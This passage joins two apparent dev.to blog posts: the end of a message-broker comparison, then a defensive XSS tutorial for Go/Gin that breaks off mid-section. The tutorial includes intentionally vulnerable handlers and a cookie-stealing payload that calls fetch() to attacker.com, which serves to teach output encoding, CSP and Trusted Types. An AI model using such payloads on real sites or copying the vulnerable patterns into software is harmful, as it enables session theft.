href="https://dev.to/mahdi0shamlou/owasp-top-10-for-developers-2026-edition-how-to-actually-fix-the-most-dangerous-web-11pi">OWASP Top 10</a> or <a href="https://dev.to/mahdi0shamlou/injection-attacks-are-not-dead-sql-nosql-orm-and-command-injection-how-to-actually-fix-them-f89">SQL/NoSQL injection</a> articles, you know I take reliability and security seriously. If you’ve seen my <a href="https://dev.to/mahdi0shamlou/mahdi-shamlou-durable-workflow-engines-comparison-temporal-dbos-transact-prefect-custom-3a6a">durable workflow engines</a> post, you know I care about building systems that don’t fall apart under real-world conditions.</p> <p>Today, we’re tackling a question that comes up in every serious backend discussion:</p> <blockquote> <p><strong>Which message broker should I use in 2026?</strong></p> </blockquote> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4hev3ze0ffwqjjqhzuhg.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4hev3ze0ffwqjjqhzuhg.png" alt="Mahdi Shamlou | مهدی شاملو" width="800" height="533"></a></p> <p>I’ve seen countless debates online:</p> <ul> <li>“Kafka is always better.”</li> <li>“RabbitMQ is outdated.”</li> <li>“NATS is insanely fast.”</li> <li>“Just use Redis.”</li> </ul> <p>But most comparisons are either outdated, overly biased, or written without real engineering tradeoffs.</p> <p>So I decided to make a fresh, practical comparison for software engineers in 2026.</p> <p>Let’s dive in.</p> <h2> What Is a Message Broker? </h2> <p>A message broker helps different services talk to each other.</p> <p>For example, instead of this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">payment_service</span><span class="p">.</span><span class="nf">process_order</span><span class="p">(</span><span class="n">order</span><span class="p">)</span> </code></pre> </div> <p>you send a message:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">broker</span><span class="p">.</span><span class="nf">publish</span><span class="p">(</span><span class="sh">"</span><span class="s">order.created</span><span class="sh">"</span><span class="p">,</span> <span class="n">order</span><span class="p">)</span> </code></pre> </div> <p>Then another service reads that message and does the work.</p> <p>This helps us build systems that are:</p> <ul> <li>More scalable</li> <li>Easier to manage</li> <li>More reliable</li> <li>Better for background jobs</li> </ul> <p>Message brokers are useful for:</p> <ul> <li>Microservices</li> <li>Notifications</li> <li>Payment systems</li> <li>Background tasks</li> <li>Event-driven systems</li> <li>Real-time systems</li> </ul> <p>Today I want to compare these options:</p> <ol> <li>Kafka</li> <li>RabbitMQ</li> <li>NATS</li> <li>Redis Streams</li> </ol> <h2> 1. Kafka </h2> <p>Kafka is one of the most popular message brokers.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj29q8h6rgfdvytoxr4yc.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj29q8h6rgfdvytoxr4yc.png" alt="Mahdi Shamlou" width="800" height="1200"></a></p> <p>Big companies like LinkedIn, Uber, and Netflix use it for handling a huge amount of data.</p> <p>Kafka is very powerful and works well for large systems.</p> <h3> How it works </h3> <p>Kafka stores messages inside something called <strong>topics</strong>.</p> <p>Messages stay there for some time, even after consumers read them.</p> <p>This means you can:</p> <ul> <li>Read messages again</li> <li>Replay events</li> <li>Save system history</li> <li>Process a lot of data</li> </ul> <h3> Pros </h3> <ul> <li> Very scalable</li> <li> High performance</li> <li> Good for large systems</li> <li> Can replay old messages</li> <li> Strong reliability</li> </ul> <h3> Cons </h3> <ul> <li> Harder to learn</li> <li> More setup and infrastructure</li> <li> Too much for small projects</li> </ul> <h3> Best for </h3> <ul> <li> Large systems</li> <li> Analytics</li> <li> Event-driven architecture</li> <li> High traffic systems</li> </ul> <h2> 2. RabbitMQ </h2> <p>RabbitMQ is one of the oldest and most trusted message brokers.</p> <p>Many developers use it because it is easier than Kafka and works very well for business systems.</p> <h3> How it works </h3> <p>RabbitMQ sends messages into queues.</p> <p>Consumers read the messages and confirm when the job is finished.</p> <p>RabbitMQ supports:</p> <ul> <li>Retry</li> <li>Delayed messages</li> <li>Priority queues</li> <li>Different routing methods</li> </ul> <h3> Pros </h3> <ul> <li> Easy to understand</li> <li> Reliable</li> <li> Good retry support</li> <li> Mature and stable</li> <li> Easier than Kafka</li> </ul> <h3> Cons </h3> <ul> <li> Not the best for very high scale</li> <li> Message replay is weaker than Kafka</li> </ul> <h3> Best for </h3> <ul> <li> Payment systems</li> <li> Notifications</li> <li> Background jobs</li> <li> Business applications</li> </ul> <h2> 3. NATS </h2> <p>NATS is lightweight, simple, and very fast.</p> <p>Many cloud-native systems use NATS because it is easy to run and gives very good performance.</p> <h3> How it works </h3> <p>NATS uses a publish/subscribe model.</p> <p>Services send messages, and other services receive them.</p> <p>With <strong>JetStream</strong>, NATS also supports persistence and better durability.</p> <h3> Pros </h3> <ul> <li> Very fast</li> <li> Lightweight</li> <li> Easy setup</li> <li> Good for cloud systems</li> </ul> <h3> Cons </h3> <ul> <li> Smaller ecosystem than Kafka</li> <li> Fewer features compared to RabbitMQ and Kafka</li> </ul> <h3> Best for </h3> <ul> <li> Real-time systems</li> <li> Internal service communication</li> <li> Cloud applications</li> <li> Fast microservices</li> </ul> <h2> 4. Redis Streams </h2> <p>Many developers already use Redis.</p> <p>But some people forget that Redis can also work as a message broker.</p> <p>Redis Streams is simple and useful for many systems.</p> <h3> How it works </h3> <p>Redis stores messages in streams.</p> <p>Consumers can read messages in groups and process them.</p> <p>It supports:</p> <ul> <li> Persistence</li> <li> Retry</li> <li> Consumer groups</li> </ul> <h3> Pros </h3> <ul> <li> Easy to start</li> <li> Simple setup</li> <li> Good if you already use Redis</li> <li> No extra infrastructure</li> </ul> <h3> Cons </h3> <ul> <li> Not good for very large systems</li> <li> Fewer advanced features</li> </ul> <h3> Best for </h3> <ul> <li> Small and medium projects</li> <li> Background jobs</li> <li> Existing Redis projects</li> </ul> <h1> Quick Comparison </h1> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Feature</th> <th>Kafka</th> <th>RabbitMQ</th> <th>NATS</th> <th>Redis Streams</th> </tr> </thead> <tbody> <tr> <td>Speed</td> <td>High</td> <td>Medium</td> <td>Very High</td> <td>High</td> </tr> <tr> <td>Easy Setup</td> <td>No</td> <td>Medium</td> <td>Yes</td> <td>Yes</td> </tr> <tr> <td>Scalability</td> <td>Very High</td> <td>Good</td> <td>High</td> <td>Medium</td> </tr> <tr> <td>Reliability</td> <td>Strong</td> <td>Strong</td> <td>Good</td> <td>Good</td> </tr> <tr> <td>Learning Curve</td> <td>Hard</td> <td>Medium</td> <td>Easy</td> <td>Easy</td> </tr> </tbody> </table></div> <h2> My Take: Which One Should You Use? </h2> <p>For most teams, I think this is a good choice:</p> <blockquote> <p>Start with RabbitMQ or NATS</p> </blockquote> <p>If you want reliability and good features:</p> <p><strong>RabbitMQ</strong></p> <p>If you want speed and simplicity:</p> <p><strong>NATS</strong></p> <p><strong>Use Redis Streams</strong> if you already use Redis. Sometimes you do not need another service. Redis Streams can be enough for many projects.</p> <p>Use Kafka when your system becomes bigger. Kafka is powerful. But many teams start using Kafka too early. If your project is small or medium size, Kafka may add extra complexity.</p> <p>Use Kafka if you need:</p> <ul> <li> Very high scale</li> <li> Event replay</li> <li> Analytics systems</li> <li> Large distributed systems</li> </ul> <h2> Final Thoughts </h2> <p>There is no perfect message broker. Every tool has advantages and disadvantages. Choose based on your project needs.</p> <p>My simple suggestion:</p> <ul> <li> RabbitMQ → business systems</li> <li> NATS → fast modern systems</li> <li> Redis Streams → simple projects</li> <li> Kafka → large systems</li> </ul> <h2> Want More? </h2> <p>If you enjoyed this deep dive check out my other articles:</p> <ul> <li> <a href="https://dev.to/mahdi0shamlou/xss-attacks-are-everywhere-reflected-stored-dom-based-how-to-actually-fix-them-2026-1hm">XSS Attacks Are Everywhere: Reflected, Stored, DOM-Based — How to Actually Fix Them (2026) </a> — xss story.</li> <li> <a href="https://dev.to/mahdi0shamlou/injection-attacks-are-not-dead-sql-nosql-orm-and-command-injection-how-to-actually-fix-them-f89">Injection Attacks Are Not Dead: SQL, NoSQL, ORM, and Command Injection — How to Actually Fix Them</a> — The story that started it all.</li> <li> <a href="https://dev.to/mahdi0shamlou/owasp-top-10-for-developers-2026-edition-how-to-actually-fix-the-most-dangerous-web-11pi">OWASP Top 10 for Developers (2026 Edition) — How to Actually Fix the Most Dangerous Web Vulnerabilities fixes.</a> — Full list with code </li> <li> <a href="https://dev.to/mahdi0shamlou/what-is-a-sandbox-how-to-safely-run-and-analyze-any-unknown-exe-2m30">What Is a Sandbox? How to Safely Run Any Unknown .exe </a> — Essential for security testing.</li> </ul> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl6djurl73pw504hx793j.webp" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl6djurl73pw504hx793j.webp" alt="Mahdi Shamlou" width="800" height="1067"></a></p> <p>🔗 LinkedIn:<br> <a href="https://www.linkedin.com/in/mahdi-shamlou-3b52b8278" rel="noopener noreferrer">https://www.linkedin.com/in/mahdi-shamlou-3b52b8278</a><br> 📱 Telegram:<br> <a href="https://telegram.me/mahdi0shamlou" rel="noopener noreferrer">https://telegram.me/mahdi0shamlou</a><br> 📸 Instagram:<br> <a href="https://www.instagram.com/mahdi0shamlou/" rel="noopener noreferrer">https://www.instagram.com/mahdi0shamlou/</a></p> <p>Author: Mahdi Shamlou | مهدی شاملو</p> programming systemdesign messagebroker microservices XSS Attacks Are Everywhere: Reflected, Stored, DOM-Based — How to Actually Fix Them (2026) | Mahdi Shamlou Mahdi SHamlou | مهدی شاملو Thu, 28 May 2026 12:54:19 +0000 https://dev.to/mahdi0shamlou/xss-attacks-are-everywhere-reflected-stored-dom-based-how-to-actually-fix-them-2026-1hm https://dev.to/mahdi0shamlou/xss-attacks-are-everywhere-reflected-stored-dom-based-how-to-actually-fix-them-2026-1hm <p><a href="https://dev.to/mahdi0shamlou">Mahdi Shamlou</a> here.</p> <blockquote> <p>Mahdi, okay fine — you got me with NoSQL injection last time ( <a href="https://dev.to/mahdi0shamlou/injection-attacks-are-not-dead-sql-nosql-orm-and-command-injection-how-to-actually-fix-them-f89">read that story here</a> ). But my site is definitely safe from XSS now. I sanitize all inputs on the backend in Go, I use strict validation, and I even have a WAF. It's impossible to hack.</p> </blockquote> <p>I smiled. Then I asked for his URL — again.</p> <p>Within 3 minutes, I popped an alert(document.cookie) on his profile page. Then I upgraded it to silently exfiltrate his session token to my server. His face went pale. Again.</p> <p>Moral of the story: "I sanitize input on the backend" does NOT mean "I'm XSS-proof". XSS isn't about input — it's about output. If you render untrusted data into HTML, JavaScript, CSS, or URLs without proper context-aware encoding, you're vulnerable — no matter your stack, no matter your sanitization.</p> <p>In this guide, I'll show you:</p> <ul> <li>How I stole my friend's session with a 1-line XSS payload (and how to fix it in Go/Gin)</li> <li>The 3 main XSS types — with real Go (Gin) code examples</li> <li>Why even careful backend sanitization can fail against DOM-based XSS</li> <li>Content Security Policy, DOMPurify, and Trusted Types — what actually works</li> <li>Actual Go code fixes + tools to find these bugs automatically </li> </ul> <p>Let's dive in.<br> 🔗 Missed the NoSQL injection takedown? Read it here:<br> ➡️ <a href="https://dev.to/mahdi0shamlou/injection-attacks-are-not-dead-sql-nosql-orm-and-command-injection-how-to-actually-fix-them-f89">Injection Attacks Are Not Dead: SQL, NoSQL, ORM, and Command Injection — How to Actually Fix Them</a></p> <h2> What Is XSS, Really? </h2> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp9us8a0oe9wu9vge7c8z.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp9us8a0oe9wu9vge7c8z.png" alt="Mahdi Shamlou" width="800" height="640"></a></p> <p>Cross-Site Scripting (XSS) is a web security vulnerability that allows an attacker to inject malicious client-side scripts (usually JavaScript) into web pages viewed by other users.</p> <p>The browser executes the code as if it came from the trusted site itself — because technically, it did. The root cause? Untrusted data is rendered into the page without proper encoding or sanitization.</p> <blockquote> <p>XSS isn't about "hacking the server". It's about hacking the user's browser — and using that trust to steal cookies, redirect users, log keystrokes, or even take over accounts.</p> </blockquote> <p>OWASP ranks XSS as a permanent member of the Top 10 (A03 in 2026, but historically A07). And it’s still everywhere — even on sites with “strict backend validation”.</p> <p>Let’s break down the three flavours using only Go/Gin.</p> <h2> The 3 Main XSS Types (With Go/Gin Examples) </h2> <h3> Reflected XSS — The “Click This Link” Attack </h3> <p>How it happens:<br> User input is immediately reflected back in the server’s response without encoding. Attackers craft a malicious link and trick victims into clicking it.</p> <p>Vulnerable Go (Gin) code:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight go"><code><span class="k">package</span> <span class="n">main</span> <span class="k">import</span> <span class="s">"github.com/gin-gonic/gin"</span> <span class="k">func</span> <span class="n">main</span><span class="p">()</span> <span class="p">{</span> <span class="n">r</span> <span class="o">:=</span> <span class="n">gin</span><span class="o">.</span><span class="n">Default</span><span class="p">()</span> <span class="n">r</span><span class="o">.</span><span class="n">GET</span><span class="p">(</span><span class="s">"/search"</span><span class="p">,</span> <span class="k">func</span><span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">gin</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="p">{</span> <span class="n">q</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">Query</span><span class="p">(</span><span class="s">"q"</span><span class="p">)</span> <span class="c">// 🚨 DANGER: raw string concatenation into HTML</span> <span class="n">html</span> <span class="o">:=</span> <span class="s">"&lt;h1&gt;Search results for: "</span> <span class="o">+</span> <span class="n">q</span> <span class="o">+</span> <span class="s">"&lt;/h1&gt;"</span> <span class="n">c</span><span class="o">.</span><span class="n">Data</span><span class="p">(</span><span class="m">200</span><span class="p">,</span> <span class="s">"text/html"</span><span class="p">,</span> <span class="p">[]</span><span class="kt">byte</span><span class="p">(</span><span class="n">html</span><span class="p">))</span> <span class="p">})</span> <span class="n">r</span><span class="o">.</span><span class="n">Run</span><span class="p">()</span> <span class="p">}</span> </code></pre> </div> <p>Attacker payload:</p> <blockquote> <p>/search?q=fetch(&amp;#39;&lt;a href="https://attacker.com/steal?cookie=&amp;#x27;+document.cookie"&gt;https://attacker.com/steal?cookie=&amp;#39;+document.cookie&lt;/a&gt;)</p> </blockquote> <p>Result:</p> <blockquote> <p>The victim’s browser executes the script and sends their session cookie to the attacker.</p> </blockquote> <p>Fix — Use Gin’s template engine (auto‑escaping):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight go"><code> <span class="n">r</span><span class="o">.</span><span class="n">GET</span><span class="p">(</span><span class="s">"/search-safe"</span><span class="p">,</span> <span class="k">func</span><span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">gin</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="p">{</span> <span class="n">q</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">Query</span><span class="p">(</span><span class="s">"q"</span><span class="p">)</span> <span class="c">// templates/search.tmpl: &lt;h1&gt;Search results for: {{ .Q }}&lt;/h1&gt;</span> <span class="n">c</span><span class="o">.</span><span class="n">HTML</span><span class="p">(</span><span class="m">200</span><span class="p">,</span> <span class="s">"search.tmpl"</span><span class="p">,</span> <span class="n">gin</span><span class="o">.</span><span class="n">H</span><span class="p">{</span><span class="s">"Q"</span><span class="o">:</span> <span class="n">q</span><span class="p">})</span> <span class="p">})</span> </code></pre> </div> <p>Go’s html/template automatically escapes &amp;, &lt;, &gt;, ', " and is context‑aware.</p> <h3> Stored XSS — The Silent Killer </h3> <p>How it happens:<br> Malicious input is saved in the database and later displayed to other users. Think comment sections, user profiles, or forum posts.</p> <p>Vulnerable Go (Gin + MongoDB) code:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight go"><code><span class="n">r</span><span class="o">.</span><span class="n">POST</span><span class="p">(</span><span class="s">"/comment"</span><span class="p">,</span> <span class="k">func</span><span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">gin</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="p">{</span> <span class="k">var</span> <span class="n">cmt</span> <span class="k">struct</span><span class="p">{</span> <span class="n">Username</span><span class="p">,</span> <span class="n">Text</span> <span class="kt">string</span> <span class="p">}</span> <span class="n">c</span><span class="o">.</span><span class="n">BindJSON</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cmt</span><span class="p">)</span> <span class="n">db</span><span class="o">.</span><span class="n">Collection</span><span class="p">(</span><span class="s">"comments"</span><span class="p">)</span><span class="o">.</span><span class="n">InsertOne</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">cmt</span><span class="p">)</span> <span class="c">// stored raw</span> <span class="p">})</span> <span class="n">r</span><span class="o">.</span><span class="n">GET</span><span class="p">(</span><span class="s">"/comments"</span><span class="p">,</span> <span class="k">func</span><span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">gin</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="p">{</span> <span class="k">var</span> <span class="n">comments</span> <span class="p">[]</span><span class="k">struct</span><span class="p">{</span> <span class="n">Username</span><span class="p">,</span> <span class="n">Text</span> <span class="kt">string</span> <span class="p">}</span> <span class="n">db</span><span class="o">.</span><span class="n">Collection</span><span class="p">(</span><span class="s">"comments"</span><span class="p">)</span><span class="o">.</span><span class="n">Find</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">bson</span><span class="o">.</span><span class="n">M</span><span class="p">{})</span><span class="o">.</span><span class="n">All</span><span class="p">(</span><span class="o">&amp;</span><span class="n">comments</span><span class="p">)</span> <span class="n">html</span> <span class="o">:=</span> <span class="s">"&lt;ul&gt;"</span> <span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">cmt</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">comments</span> <span class="p">{</span> <span class="c">// 🚨 dangerous concatenation</span> <span class="n">html</span> <span class="o">+=</span> <span class="s">"&lt;li&gt;&lt;b&gt;"</span> <span class="o">+</span> <span class="n">cmt</span><span class="o">.</span><span class="n">Username</span> <span class="o">+</span> <span class="s">"&lt;/b&gt;: "</span> <span class="o">+</span> <span class="n">cmt</span><span class="o">.</span><span class="n">Text</span> <span class="o">+</span> <span class="s">"&lt;/li&gt;"</span> <span class="p">}</span> <span class="n">html</span> <span class="o">+=</span> <span class="s">"&lt;/ul&gt;"</span> <span class="n">c</span><span class="o">.</span><span class="n">Data</span><span class="p">(</span><span class="m">200</span><span class="p">,</span> <span class="s">"text/html"</span><span class="p">,</span> <span class="p">[]</span><span class="kt">byte</span><span class="p">(</span><span class="n">html</span><span class="p">))</span> <span class="p">})</span> </code></pre> </div> <p>Attacker posts:</p> <blockquote> <p>{ "username": "hacker", "text": "alert(&amp;#39;XSS&amp;#39;)" }<br> Every visitor to /comments gets the payload executed.</p> </blockquote> <p>Fix — Encode on output using Go templates:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight go"><code><span class="c">// comments.tmpl:</span> <span class="c">// &lt;ul&gt;{{range .}}&lt;li&gt;&lt;b&gt;{{.Username}}&lt;/b&gt;: {{.Text}}&lt;/li&gt;{{end}}&lt;/ul&gt;</span> <span class="n">r</span><span class="o">.</span><span class="n">GET</span><span class="p">(</span><span class="s">"/comments-safe"</span><span class="p">,</span> <span class="k">func</span><span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">gin</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="p">{</span> <span class="k">var</span> <span class="n">comments</span> <span class="p">[]</span><span class="n">Comment</span> <span class="n">db</span><span class="o">.</span><span class="n">Collection</span><span class="p">(</span><span class="s">"comments"</span><span class="p">)</span><span class="o">.</span><span class="n">Find</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">bson</span><span class="o">.</span><span class="n">M</span><span class="p">{})</span><span class="o">.</span><span class="n">All</span><span class="p">(</span><span class="o">&amp;</span><span class="n">comments</span><span class="p">)</span> <span class="n">c</span><span class="o">.</span><span class="n">HTML</span><span class="p">(</span><span class="m">200</span><span class="p">,</span> <span class="s">"comments.tmpl"</span><span class="p">,</span> <span class="n">gin</span><span class="o">.</span><span class="n">H</span><span class="p">{</span><span class="s">"Comments"</span><span class="o">:</span> <span class="n">comments</span><span class="p">})</span> <span class="p">})</span> </code></pre> </div> <p>Key lesson: Stored XSS proves that “sanitizing input on the backend” is a myth. You must encode on output, based on the context (HTML, attribute, JavaScript, etc.).</p> <h3> DOM‑Based XSS — The Frontend Betrayal </h3> <p>How it happens:<br> The vulnerability exists entirely in client‑side JavaScript. The server may be completely innocent — it sends safe HTML, but the frontend code unsafely manipulates the DOM using attacker‑controlled data (like location.hash or URL parameters).</p> <p>Vulnerable Go/Gin serving an HTML file:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight go"><code> <span class="n">r</span><span class="o">.</span><span class="n">Static</span><span class="p">(</span><span class="s">"/static"</span><span class="p">,</span> <span class="s">"./static"</span><span class="p">)</span> <span class="n">r</span><span class="o">.</span><span class="n">GET</span><span class="p">(</span><span class="s">"/profile"</span><span class="p">,</span> <span class="k">func</span><span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">gin</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="p">{</span> <span class="n">c</span><span class="o">.</span><span class="n">HTML</span><span class="p">(</span><span class="m">200</span><span class="p">,</span> <span class="s">"profile.tmpl"</span><span class="p">,</span> <span class="no">nil</span><span class="p">)</span> <span class="p">})</span> </code></pre> </div> <p>And inside profile.tmpl (no backend sanitisation can help here):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code> <span class="nt">&lt;script&gt;</span> <span class="kd">let</span> <span class="nx">name</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">URLSearchParams</span><span class="p">(</span><span class="nx">location</span><span class="p">.</span><span class="nx">search</span><span class="p">).</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">name</span><span class="dl">'</span><span class="p">);</span> <span class="c1">// 🚨 dangerous innerHTML</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">'</span><span class="s1">welcome</span><span class="dl">'</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">Hello, </span><span class="dl">'</span> <span class="o">+</span> <span class="nx">name</span><span class="p">;</span> <span class="nt">&lt;/script&gt;</span> </code></pre> </div> <p>Attacker payload:</p> <blockquote> <p>/profile?name=</p> </blockquote> <p>Fix — Use safe DOM APIs (still inside Go template):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code> <span class="nt">&lt;script&gt;</span> <span class="kd">let</span> <span class="nx">name</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">URLSearchParams</span><span class="p">(</span><span class="nx">location</span><span class="p">.</span><span class="nx">search</span><span class="p">).</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">name</span><span class="dl">'</span><span class="p">);</span> <span class="c1">// ✅ use textContent</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">'</span><span class="s1">welcome</span><span class="dl">'</span><span class="p">).</span><span class="nx">textContent</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">Hello, </span><span class="dl">'</span> <span class="o">+</span> <span class="nx">name</span><span class="p">;</span> <span class="nt">&lt;/script&gt;</span> </code></pre> </div> <p>Or sanitise with DOMPurify (add the library in your static files):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;script </span><span class="na">src=</span><span class="s">"/static/purify.min.js"</span><span class="nt">&gt;&lt;/script&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">let</span> <span class="nx">name</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">URLSearchParams</span><span class="p">(</span><span class="nx">location</span><span class="p">.</span><span class="nx">search</span><span class="p">).</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">name</span><span class="dl">'</span><span class="p">);</span> <span class="kd">let</span> <span class="nx">clean</span> <span class="o">=</span> <span class="nx">DOMPurify</span><span class="p">.</span><span class="nf">sanitize</span><span class="p">(</span><span class="nx">name</span><span class="p">,</span> <span class="p">{</span><span class="na">ALLOWED_TAGS</span><span class="p">:</span> <span class="p">[]});</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">'</span><span class="s1">welcome</span><span class="dl">'</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">clean</span><span class="p">;</span> <span class="nt">&lt;/script&gt;</span> </code></pre> </div> <p>DOM‑based XSS is why scanning your frontend code for innerHTML, document.write, or eval() is critical. No amount of server‑side filtering can stop it.</p> <h3> Why “Backend Sanitization” Fails </h3> <p>My friend in the story used Go, strict validation, and a WAF. But DOM‑based XSS bypassed all of it.</p> <p>The only reliable prevention:</p> <blockquote> <p>Context‑aware output encoding on the rendering layer (HTML, JS, URL, CSS), plus a Content Security Policy (CSP) as a second line of defence.</p> </blockquote> <h3> Content Security Policy (CSP) + Trusted Types — Your Safety Net </h3> <p>Even if an XSS bug exists, CSP can block the malicious script from executing. And Trusted Types makes it impossible to write unsafe DOM injection code in the first place — a type‑safe approach to XSS prevention.</p> <p>Set CSP Header in Gin Middleware<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight go"><code><span class="k">func</span> <span class="n">CSP</span><span class="p">()</span> <span class="n">gin</span><span class="o">.</span><span class="n">HandlerFunc</span> <span class="p">{</span> <span class="k">return</span> <span class="k">func</span><span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">gin</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="p">{</span> <span class="n">c</span><span class="o">.</span><span class="n">Header</span><span class="p">(</span><span class="s">"Content-Security-Policy"</span><span class="p">,</span> <span class="s">"default-src 'self'; "</span> <span class="o">+</span> <span class="s">"script-src 'nonce-abc123' 'strict-dynamic'; "</span> <span class="o">+</span> <span class="s">"require-trusted-types-for 'script'; "</span> <span class="o">+</span> <span class="s">"trusted-types myPolicy"</span><span class="p">)</span> <span class="n">c</span><span class="o">.</span><span class="n">Next</span><span class="p">()</span> <span class="p">}</span> <span class="p">}</span> <span class="n">r</span><span class="o">.</span><span class="n">Use</span><span class="p">(</span><span class="n">CSP</span><span class="p">())</span> </code></pre> </div> <p>What this CSP does:</p> <ul> <li> default-src 'self' – only allow resources from the same origin.</li> <li> script-src 'nonce-abc123' 'strict-dynamic' – only execute scripts with a matching nonce (prevents inline script injection).</li> <li> require-trusted-types-for 'script' – enforces Trusted Types: the browser will reject any string passed to an injection sink (innerHTML, outerHTML, document.write, etc.).</li> <li> trusted-types myPolicy – allows only policies named myPolicy to create trusted HTML.</li> </ul> <h3> Trusted Types — Type‑Safe DOM Injection </h3> <p>With Trusted Types enabled, this code throws an error:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// 🚨 Browser blocks this (TypeError)</span> <span class="nx">element</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">userInput</span><span class="p">;</span> </code></pre> </div> <p>Instead, you must create a trusted type using a policy:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// Create a policy (once, usually in your main.js)</span> <span class="kd">const</span> <span class="nx">policy</span> <span class="o">=</span> <span class="nx">trustedTypes</span><span class="p">.</span><span class="nf">createPolicy</span><span class="p">(</span><span class="dl">'</span><span class="s1">myPolicy</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">createHTML</span><span class="p">:</span> <span class="p">(</span><span class="nx">input</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="c1">// Sanitize or safely encode here</span> <span class="k">return</span> <span class="nx">DOMPurify</span><span class="p">.</span><span class="nf">sanitize</span><span class="p">(</span><span class="nx">input</span><span class="p">);</span> <span class="p">}</span> <span class="p">});</span> <span class="c1">// ✅ Safe: browser accepts because it's a TrustedHTML object</span> <span class="nx">element</span><span class="p">.</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">policy</span><span class="p">.</span><span class="nf">createHTML</span><span class="p">(</span><span class="nx">userInput</span><span class="p">);</span> </code></pre> </div> <h3> Why Trusted Types wins: </h3> <ul> <li>Type safety – the browser enforces that only trusted objects reach dangerous functions.</li> <li> No forgetting – you can’t accidentally write innerHTML = x without a policy.</li> <li> Backwards compatible – unsupported browsers ignore the header.</li> </ul> <h2> 